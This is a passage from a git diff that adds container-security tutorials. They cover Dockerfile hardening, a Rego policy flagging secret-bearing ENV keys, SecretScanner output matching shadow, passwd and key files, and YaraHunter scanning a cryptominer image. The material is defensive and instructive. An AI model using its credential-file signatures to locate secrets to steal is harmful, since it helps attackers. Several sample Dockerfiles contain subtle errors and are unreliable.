+``` + +```Dockerfile +FROM alpine +RUN apk update && apk add curl nginx nginx-mod-http-geoip2-1.16.1-r6 \ +rm -rf /var/cache/apt/* +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] + +``` +- Don't ignore `.dockerignore` + +![](https://miro.medium.com/max/800/0*FNJQYGBJTCJ6CwwI.gif) + +``` +node_modules +.env +secrets/ +*pem +*.md +``` + +```Dockerfile +FROM node:10 +WORKDIR 
/nodeapp +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] +``` + +- choose slim variant + + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841214/pasted-from-clipboard.png) + +- cut the root + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841215/pasted-from-clipboard.png) + +```Dockerfile +FROM node:10 +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] +``` + +```Dockerfile +FROM node:10 +RUN user add -m nodeapp +USER nodeappuser +RUN whoami +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +## Remove Unwanted + +![](https://miro.medium.com/max/1060/0*5Kgip-LsvTRHXb7f.gif) + + +TAG Wisely + + + +![](https://miro.medium.com/max/960/0*XchFJrkVCTwcC1Aj.gif) + +So No to latest Tags + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841223/pasted-from-clipboard.png) + +Public Private Registry + +![](https://miro.medium.com/max/960/0*cWv3QB9YHc_5a3D_.gif) + +keep it single +![](https://miro.medium.com/max/700/0*RJiU_CQIcwj5t-6I.gif) + +## Avoid Hard Coding + +![](https://miro.medium.com/max/1000/0*cg2kGD2eKdypyJzT.gif) + +``` +ARG VERSION +FROM node:$VERSION +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +``` +docker build -t testimage –build-arg VERSION=10 . +docker build -t testimage –build-arg VERSION=9 . +``` + +adding metadata + +![](https://miro.medium.com/max/1374/0*Pz7-FhTCNRu7Qs9B.jpg) + +``` +FROM node:10 +LABEL version=β€œ1.0” maintainer=β€œSangam Biradar ” +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +Rego Policies + +- write custom policies + +```json + +package play + + +suspicious_env_keys = [ + "passwd", + "password", + "secret", + "key", + "access", + "api_key", + "apikey", + "token", +] + +pkg_update_commands = [ + "apk upgrade", + "apt-get upgrade", + "dist-upgrade", +] + +image_tag_list = [ + "latest", + "LATEST", +] + +# Looking for suspicious environemnt variables +deny[msg] { + input[i].Cmd == "env" + val := input[i].Value + contains(lower(val[_]), suspicious_env_keys[_]) + msg = sprintf("Suspicious ENV key found: %s", [val]) +} + +# Looking for latest docker image used +warn[msg] { + input[i].Cmd == "from" + val := split(input[i].Value[0], ":") + count(val) == 1 + msg = sprintf("Do not use latest tag with image: %s", [val]) +} + +# Looking for latest docker image used +warn[msg] { + input[i].Cmd == "from" + val := split(input[i].Value[0], ":") + contains(val[1], image_tag_list[_]) + msg = sprintf("Do not use latest tag with image: %s", [input[i].Value]) +} + +# Looking for apk upgrade command used in Dockerfile +deny[msg] { + input[i].Cmd == "run" + val := concat(" ", input[i].Value) + contains(val, pkg_update_commands[_]) + msg = sprintf("Do not use upgrade commands: %s", [val]) +} + +# Looking for ADD command instead using COPY command +deny[msg] { + input[i].Cmd == "add" + val := concat(" ", input[i].Value) + msg = sprintf("Use COPY instead of ADD: %s", [val]) +} + +# sudo usage +deny[msg] { + input[i].Cmd == "run" + val := concat(" ", input[i].Value) + contains(lower(val), "sudo") + msg = sprintf("Avoid using 'sudo' command: %s", [val]) +} + +# # No Healthcheck usage +# deny[msg] { +# input[i].Cmd == "healthcheck" +# msg := "no healthcheck" +# } + +``` +[Rego 
Playground](https://play.openpolicyagent.org/p/epcbtaBtSF)
+
diff --git a/content/en/containersecurity/b16.SecretScanner 2.md b/content/en/containersecurity/b16.SecretScanner 2.md
new file mode 100644
index 0000000..f8dc508
--- /dev/null
+++ b/content/en/containersecurity/b16.SecretScanner 2.md
@@ -0,0 +1,354 @@
+---
+title: "SecretScanner - Finding secrets and passwords in container images and file systems "
+slug: "SecretScanner-Finding-secrets-and-passwords-in-container-images-and-file-systems"
+---
+
+Published on [CloudNativeFolks](https://blog.cloudnativefolks.org/finding-leaked-secrets-in-your-container-images-and-file-system-with-secretscanner)
+
+One of the most common mistakes is leaking secrets via Docker images or the file system. In this blog post we will use [Deepfence's](https://deepfence.io) open source project [SecretScanner](https://github.com/deepfence/SecretScanner).
+
+A few days back I found an interesting Twitter discussion among cybersecurity community members.
+
+
+
+Here you can see Uber's article about their security incident:
+
+%[https://www.uber.com/newsroom/security-update/]
+
+Let's understand why a secret scanner helps you secure your container images and file system.
+
+If you look at Docker Hub, most images are public, and thousands of secrets have leaked over the years.
+
+As an example from a past supply chain attack, a Codecov Docker image contained git credentials that allowed an attacker to gain access to Codecov's private git repositories and commit backdoors into their product, which later affected around 22,000 of Codecov's users.
+
+## Let's write an `insecure.Dockerfile`
+
+```plaintext
+FROM python:3.9-slim
+ENV DATABASE_PASSWORD "SuperSecret"
+```
+
+## Don't Store Secrets in Images
+
+Secrets are sensitive pieces of information such as passwords, database credentials, SSH keys, tokens, and TLS certificates, to name a few. These should not be baked into your images without being encrypted, since unauthorized users who gain access to the image can merely examine the layers to extract the secrets.
+
+Instead, they should be injected via:
+
+* Environment variables (at run-time)
+
+* Build-time arguments (at build-time)
+
+* An orchestration tool like Docker Swarm (via Docker secrets) or Kubernetes (via Kubernetes secrets)
+
+* Also, you can help prevent leaking secrets by adding common secret files and folders to your .dockerignore file:
+
+
+```plaintext
+**/.env
+**/.aws
+**/.ssh
+```
+
+Be explicit about which files get copied into the image rather than copying all files recursively:
+
+```plaintext
+# BAD
+COPY . .
+
+# GOOD
+COPY ./app.py .
+```
+
+## Environment Variables
+
+You can pass secrets via environment variables, but they will be visible in all child processes, linked containers, and logs, as well as via `docker inspect`. It's also difficult to update them. 
+
+```plaintext
+$ docker run --detach --env "DATABASE_PASSWORD=SuperSecret" python:3.9-slim
+
+d92cf5cf870eb0fdbf03c666e7fcf18f9664314b79ad58bc7618ea3445e39239
+
+
+$ docker inspect --format='{{range .Config.Env}}{{println .}}{{end}}' d92cf5cf870eb0fdbf03c666e7fcf18f9664314b79ad58bc7618ea3445e39239
+
+DATABASE_PASSWORD=SuperSecret
+PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+LANG=C.UTF-8
+GPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568
+PYTHON_VERSION=3.9.7
+PYTHON_PIP_VERSION=21.2.4
+PYTHON_SETUPTOOLS_VERSION=57.5.0
+PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/c20b0cfd643cd4a19246ccf204e2997af70f6b21/public/get-pip.py
+PYTHON_GET_PIP_SHA256=fa6f3fb93cce234cd4e8dd2beb54a51ab9c247653b52855a48dd44e6b21ff28b
+```
+
+## Build-time Arguments
+
+Build-time arguments leak in a similar way: anyone who has the image can see the values passed with --build-arg by inspecting `docker history`.
+
+```plaintext
+
+docker build --build-arg "DATABASE_PASSWORD=SuperSecret" .
+```
+
+Rather than build-time arguments, you can use a multi-stage build so that the intermediate layers are dropped from `docker history`. The multi-stage build only retains the history for the final image. Keep in mind that you can use this approach for permanent secrets that you need for your application, like a database credential.
+
+You can also use the --secret option of `docker build` to pass secrets to the build without them being stored in the image (see also the [docker secret create](https://docs.docker.com/engine/reference/commandline/secret_create/) documentation for secrets in Swarm services).
+
+```plaintext
+# secrets.txt was created beforehand with: echo "docker" > secrets.txt
+
+FROM alpine
+
+# shows secret from default secret location:
+RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
+```
+
+This will mount the secret from the secrets.txt file:
+
+```plaintext
+docker build --no-cache --progress=plain --secret id=mysecret,src=secrets.txt .
+
+# output
+...
+#4 [1/2] FROM docker.io/library/alpine
+#4 sha256:665ba8b2cdc0cb0200e2a42a6b3c0f8f684089f4cd1b81494fbb9805879120f7
+#4 CACHED
+
+#5 [2/2] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
+#5 sha256:75601a522ebe80ada66dedd9dd86772ca932d30d7e1b11bba94c04aa55c237de
+#5 0.635 docker
+#5 DONE 0.7s
+
+# exporting to image
+```
+
+Now check the image history; the secret value itself does not appear in any layer:
+
+```plaintext
+❯ docker history 49574a19241c
+IMAGE          CREATED         CREATED BY                                      SIZE      COMMENT
+49574a19241c   5 minutes ago   CMD ["/bin/sh"]                                 0B        buildkit.dockerfile.v0
+<missing>      5 minutes ago   RUN /bin/sh -c cat /run/secrets/mysecret # b…   0B        buildkit.dockerfile.v0
+<missing>      4 weeks ago     /bin/sh -c #(nop)  CMD ["/bin/sh"]              0B
+<missing>      4 weeks ago     /bin/sh -c #(nop) ADD file:aad4290d27580cc1a…   5.6MB
+```
+
+But the most modern way to scan Docker images and file systems is to use the open source tool SecretScanner, which makes it easy for developers to detect leaked secrets.
+
+Pull the latest SecretScanner image:
+
+```plaintext
+
+docker pull deepfenceio/deepfence_secret_scanner:latest
+```
+
+Pull the Docker image that you want to scan:
+
+```plaintext
+docker pull node:8.11
+```
+
+Hunt for secrets:
+
+```plaintext
+docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock deepfenceio/deepfence_secret_scanner:latest -image-name node:8.11
+```
+
+Output:
+
+```plaintext
+Scanning image /tmp/Deepfence/SecretScanning/df_node811/save-output.tar for secrets... 
+ { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 85, + "Matched Rule Name": "Potential Linux passwd file", + "Matched Part": "path", + "String to Match": "", + "Signature to Match": "etc/passwd$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 10, + "Full File Name": "etc/passwd", + "Matched Contents": "etc/passwd" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "etc/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 84, + "Matched Rule Name": "Potential Linux shadow file", + "Matched Part": "path", + "String to Match": "", + "Signature to Match": "etc/shadow$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 10, + "Full File Name": "etc/shadow", + "Matched Contents": "etc/shadow" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 68, + "Matched Rule Name": "Shell configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash|zsh|csh)rc$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "etc/skel/.bashrc", + "Matched Contents": ".bashrc" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 8, + "Full File Name": "etc/skel/.profile", + "Matched Contents": ".profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 68, + "Matched Rule Name": "Shell configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash|zsh|csh)rc$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "root/.bashrc", + "Matched Contents": ".bashrc" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + 
"Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 8, + "Full File Name": "root/.profile", + "Matched Contents": ".profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 88, + "Matched Rule Name": "Environment configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?env$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 3, + "Full File Name": "usr/bin/env", + "Matched Contents": "env" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "usr/share/base-files/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "usr/share/doc/adduser/examples/adduser.local.conf.examples/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "45475acd15f3bb8a3b04367eda1a2553d6b18d95723eb51737bc9d9a24227336", + "Matched Rule ID": 0, + "Matched Rule Name": "Potential cryptographic private key", + "Matched Part": "extension", + "String to Match": ".pem", + "Signature to Match": "", + "Severity": "low", + "Severity Score": 2.50, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 4, + "Full File Name": "etc/ssl/certs/ACCVRAIZ1.pem", + "Matched Contents": ".pem" + } +``` + +if you see about scan report its provide `Image Layer ID` and `Matched Rule Name` that describe about type of secret its detect also its provide `"Severity": "type", "Severity Score": 2.50`, with `"Matched Contents": "` + +## use .dockerignore file + +What should you add to the .dockerignore file? 
+ +* Temporary files and folders + +* Build logs + +* Local secrets + +* Local development files like docker-compose.yml + +* Version control folders like ".git", ".hg", and ".svn" Example: + + +```plaintext +**/.git +**/.gitignore +**/.vscode +**/coverage +**/.env +**/.aws +**/.ssh +Dockerfile +README.md +docker-compose.yml +**/.DS_Store +**/venv +**/env +``` + +Check it out SecretScanner and support this project by giving gitstar ! + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=SecretScanner)](https://github.com/deepfence/SecretScanner) + diff --git a/content/en/containersecurity/b17.Yarahunter 2.md b/content/en/containersecurity/b17.Yarahunter 2.md new file mode 100644 index 0000000..f23ad78 --- /dev/null +++ b/content/en/containersecurity/b17.Yarahunter 2.md @@ -0,0 +1,187 @@ +--- +title: " YaraHunter - Malware Scanner for Container Images " +slug: "YaraHunter - Malware Scanner for Container Images" +--- + + +## What is YARA ? + +YARA was originally developed by Victor Alvarez of VirusTotal and released on github in 2013 . + +> YARA , the "Pattern matching Swiss knife for malware researchers available on [github](https://github.com/VirusTotal/yara) + +#### Install yara on Mac + +```plaintext +brew install yara +``` + +#### Yara is extremely popular within because of different use case : + +* Identify and classify malware + +* Find new samples based on family-specific pattern + +* Deploy Yara Rules to identify samples and compromised device for incident response + + +#### Why Yara ? + +* Before Yara it was difficult for malware researcher To detect and classify large volumes of malware samples + +* can effective be used of hunting evolving malwares + +* Since Yara Rules are completely base on text , using an easy to understand syntax , they can be developed quickly + + +## How to write custom detection in YARA + +1. Start of the rule: Every YARA rule should be declared by using the keyword rule followed by an identifier , or unique rule would like to give your rule + +2. Add your meta section : the meta section can be used to provide comments or details about your rule information provided under meta will not be used for any variation of malware detection + +3. Declare string : this is where you can declare a variable and set it value each variable is indicated using $ sign followed by the variable name + +4. add your condition section : the condition section is where the rule declares what conditions must be met in order to rule to trigger a match . + + +### my first yara rule + +```plaintext +rule Hello_World + { + condition: + true +} +``` + +verify yara is installed or not + +```plaintext +yara --help +YARA 4.2.3, the pattern matching swiss army knife. +Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID + +Mandatory arguments to long options are mandatory for short options too. 
+ + --atom-quality-table=FILE path to a file with the atom quality table + -C, --compiled-rules load compiled rules + -c, --count print only number of matches + -d, --define=VAR=VALUE define external variable + --fail-on-warnings fail on warnings + -f, --fast-scan fast matching mode + -h, --help show this help and exit + -i, --identifier=IDENTIFIER print only rules named IDENTIFIER + --max-process-memory-chunk=NUMBER set maximum chunk size while reading process memory (default=1073741824) + -l, --max-rules=NUMBER abort scanning after matching a NUMBER of rules + --max-strings-per-rule=NUMBER set maximum number of strings per rule (default=10000) + -x, --module-data=MODULE=FILE pass FILE's content as extra data to MODULE + -n, --negate print only not satisfied rules (negate) + -N, --no-follow-symlinks do not follow symlinks when scanning + -w, --no-warnings disable warnings + -m, --print-meta print metadata + -D, --print-module-data print module data + -e, --print-namespace print rules' namespace + -S, --print-stats print rules' statistics + -s, --print-strings print matching strings + -L, --print-string-length print length of matched strings + -g, --print-tags print tags + -r, --recursive recursively search directories + --scan-list scan files listed in FILE, one per line + -z, --skip-larger=NUMBER skip files larger than the given size when scanning a directory + -k, --stack-size=SLOTS set maximum stack size (default=16384) + -t, --tag=TAG print only rules tagged as TAG + -p, --threads=NUMBER use the specified NUMBER of threads to scan a directory + -a, --timeout=SECONDS abort scanning after the given number of SECONDS + -v, --version show version information +``` + +#### Now let the computer greet you: + +```plaintext +$ yara hello.yara /yara/malware/somefile.txt +``` + +```plaintext +rule GoodMorning + { + condition: + hour < 12 and hour >= 4 +} +``` + +#### Now let the computer greet you: + +```plaintext +yara hello.yara -d hour=11 ./yara/malware/somefile.txt +GoodMorning ./yara/malware/somefile.txt +``` + +#### structure of YARA rule file + +rule RULE\_NAME { // Rule definition goes here! // Comments in Yara rules look like this! } + +The β€œmeta” section of a rule contains the description, author, reference, date, hash, and any other relevant details of the rule. This section is optional and will not be used to classify malware. `meta: description = "This is just an example" threat_level = 3 in_the_wild = true` + +The β€œstrings” section contains string patterns that are used to identify malware. Each string in the β€œstrings” section is identified with a variable name starting with a dollar sign. + +```plaintext +strings: + $a = {6A 40 68 00 30 00 00 6A 14 8D 91} + $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9} + $c = "UVODFRYSIHLNWPEJXQZAKCBGMT" +``` + +You should put signature strings that are indicative of the malware here. This example uses hex strings and text strings. But you can also use regex patterns. `strings: $a = {6A 40 68 00 30 00 00 6A 14 8D 91} // Hex strings are enclosed within curly brackets. $b = "UVODFRYSIHLNWPEJXQZAKCBGMT" // Plain text strings are enclosed within double quotes. $c = /md5: [0-9a-fA-F]{32}/ // Regex patterns are enclosed within slashes.` Finally, the β€œcondition” section describes how the string patterns in the β€œstrings” section should be used to identify a piece of malware. You can use boolean (and, or, not), relational (>, <, =, and more), and arithmetic (+, -, \*, /, %) expressions in this section. 
In our example, the rule specifies that if one of the strings $a, $b, or $c is present, the file is a silent banker trojan. `condition: $a or $b or $c` You can also define more complicated conditions like these. ``` condition: #a > 2 and $b // If $a occurs more than twice and if $b is present + +condition: ($a and $b) or ($b and $c) // If both $a and $b are present, or both $b and $c are present ``` + +## Lets Bring Malware scanner for cloud-native, as part of CI/CD and at Runtime + +Deepfence's [YaraHunter](https://github.com/deepfence/YaraHunter) - scans container images, running Docker containers, and filesystems to find indicators of malware. It uses a [YARA ruleset](https://github.com/deepfence/yara-rules/blob/main/malware.yar) to identify resources that match known malware signatures, and may indicate that the container or filesystem has been compromised. + +### YaRadare can be used to detect malware in cloud-native applications in the following ways: + +* At rest: scan local container images, before they are deployed, to verify they do not contain malware + +* At runtime: scan running docker containers, if, for example, you observe unusual network traffic or CPU activity + +* Against filesystems: at any time, YaRadare can scan a local directory or filesystem for indicators of compromise + + +we all build and scan images but we never take look at malware that packaged inside container or even file system YaraHunter can hunt malware that present at your docker images or Kubernetes cluster or you can use in CI/CD pipeline + +#### pull image you want to scan + +Images may be compromised with the installation of a cryptominer such as XMRig. In the following example, we'll scan a legitimiate cryptominer image that contains the same xmrig software that is often installed through an exploit: + +```plaintext + docker pull metal3d/xmrig +``` + +#### Run YaraHunter as Docker Container and get result in json + +![](https://raw.githubusercontent.com/deepfence/YaraHunter/main/docs/docs/yarahunter/img/yarahunter.svg) + +``` bash +docker run -it --rm --name=deepfence-yarahunter +\-v /var/run/docker.sock:/var/run/docker.sock +\-v /tmp:/home/deepfence/output +deepfenceio/yara-hunter:latest --image-name metal3d/xmrig:latest +\--json-filename=xmrig-scan.json +``` + +```bash + + Using default tag: latest latest: Pulling from metal3d/xmrig 2408cc74d12b: Pull complete 75fcf72b2223: Pull complete 4e7c4ed53fb2: Pull complete Digest: sha256:c3c27a8b2f6beede6d9c0a7e5b79bb7a7b0002cca40565e7bfd2e447f3a2a628 Status: Downloaded newer image for metal3d/xmrig:latest docker.io/metal3d/xmrig:latest WARNING: The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm64/v8) and no specific platform was requested INFO\[2022-09-09 00:53:43\] trying to connect to endpoint 'unix:///var/run/docker.sock' with timeout '10s' INFO\[2022-09-09 00:53:43\] connected successfully using endpoint: unix:///var/run/docker.sock INFO\[2022-09-09 00:53:43\] trying to connect to endpoint 'unix:///run/containerd/containerd.sock' with timeout '10s' WARN\[2022-09-09 00:53:53\] could not connect to endpoint 'unix:///run/containerd/containerd.sock': context deadline exceeded INFO\[2022-09-09 00:53:53\] trying to connect to endpoint 'unix:///run/k3s/containerd/containerd.sock' with timeout '10s' WARN\[2022-09-09 00:54:03\] could not connect to endpoint 'unix:///run/k3s/containerd/containerd.sock': context deadline exceeded INFO\[2022-09-09 00:54:03\] container runtime detected: docker +{ "Timestamp": 
"2022-09-09 00:54:27.639796179 +00:00", "Image Name": "metal3d/xmrig:latest", "Image ID": "a01f1ffa6691423ef43bfaee2a9c9f30fe08ee6df8d9d6586ae9692d90789c5a", "Malware match detected are": \[ { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/usr/local/bin/xmrig", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/build/CMakeFiles/xmrig.dir/src/base/net/stratum/Url.cpp.o", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "Cerberus", "Strings to match are": \[ "cerberus" \], "Category": \["RAT","memory"\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst", "description":"Cerberus ", "author":"Jean-Philippe Teissier / @Jipe\_ ", "date":"2013-01-12 ", "filetype":"memory ", "version":"1.0 ", "Summary": "The file /tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst has a memory match.The file has a rule match that Cerberus .The matched rule file's author is Jean-Philippe Teissier / @Jipe\_ .The matched rule file's date is 2013-01-12 .The matched rule file's filetype is memory .The matched rule file's version is 1.0 ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/base/net/stratum/Url.cpp", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/usr/local/bin/xmrig", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." 
} , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/build/CMakeFiles/xmrig.dir/src/base/net/stratum/Url.cpp.o", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "Cerberus", "Strings to match are": \[ "cerberus" \], "Category": \["RAT","memory"\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst", "description":"Cerberus ", "author":"Jean-Philippe Teissier / @Jipe\_ ", "date":"2013-01-12 ", "filetype":"memory ", "version":"1.0 ", "Summary": "The file /tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst has a memory match.The file has a rule match that Cerberus .The matched rule file's author is Jean-Philippe Teissier / @Jipe\_ .The matched rule file's date is 2013-01-12 .The matched rule file's filetype is memory .The matched rule file's version is 1.0 ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/base/net/stratum/Url.cpp", 